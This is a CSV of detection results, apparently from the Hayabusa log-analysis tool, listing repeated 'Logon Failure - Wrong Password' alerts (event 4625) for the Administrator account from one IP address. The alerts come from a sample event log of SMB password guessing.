2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5yPcTOWPuN8efJtl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dszb6s0w6glvSkSw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ynu936pVVAuDUGT5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c55o3Dca2tiUVwb2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tnDmp2KK02LyJ7Xm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xRUKrHDAmgEPcjQw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PCGKDvPhzg6BlsuU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OU28biGLJkFmB117  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 029LphuWcoo9S2hL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ItIROqP2wyzLJa9s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XngGun3HYopTkcrA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c91Qz5QNUczcm7m6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t7nyWJJJhDiqnf1d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bnj7hAp20gZE9FCe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FydQjBxO7XninU5Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3P8InIzyD86BXr1d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wvKGa3A3qw7s0cZX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QTY7tRVEMjXZXFyH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m4Ij1NSYGYbq4PxS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 47fOxZAYhjxLzEoU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aGxXaNNChVScbHe6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jTcVeB8f2Rs3Bldo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yeSnUlIbuDVNffey  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eXIM4tWru1x0AahJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m2pBLn6aO8L4kiH5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EG5daDsgTMZsNg0T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3V8z6j7GLO3ywBXc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AsezMvhUNedLNqg4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h16AvUVZG8qch7LC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PB5xe3Aieya8N3IU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ezGXIhYrkk2Q9pe5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VSGIVhD6pO5z47DY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2vEjOhJW9G3aIfV0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hyvCpW3aOZqCOldu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyhS2wAAkfmZuLll  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0bEh0KTMbbFtsfck  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mw9u61efa06vYv6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SAxij8QYLxxriIvu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HK2tbzICSpTrglud  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4rHJ70VrEwCQjSvL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8qwZT66ExkdJDZaT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ezuHluj1fEC9KdQ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bXH5uDfo4WB6QEnQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yWvZjuZhnGcrelOM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vb6ePjmpA8ZwK1PW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7e1A9ZY20WM8oDn6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 71GKLnXqSEEuc1Fw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w0GsW0vDEkpRa1X0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0HH6zUUoL0qlfFC2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AG4pYsjob1iwlOc0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dNCX5tZ0nF1foTLW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vO82Kb0kboVFuJy6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DptE2C8ZK3AxCb43  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NC8manvVP5pU8F3N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m00bI5welsLUWmwJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4shyxJk2PiH1TDlj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xZyN2WO3UVY0WQs6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oSQjAMckifap5r1k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qixqXiX0mVcuXe37  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gIfJCJz6l36WMeY9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SZxv5U7uoN6E8c8E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mlIfE0N32OQeWuNw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nkZcjpTmHcJ0uX38  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GZfaHr2Yq6xkRjOI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jvy0EIiPSnom7pn3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TN9PUb0BgI3u8Xax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xCgz5BNpQgLgW0Xi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: po2GBdrXr3XtBsWR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O2rgo6jHcqu10IGY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MLblUOGzYzVA47E9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ysuA1xpYuAGRNONJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ksedziaGzXk5VNlS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: irIfGLQdhtRRGwuo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
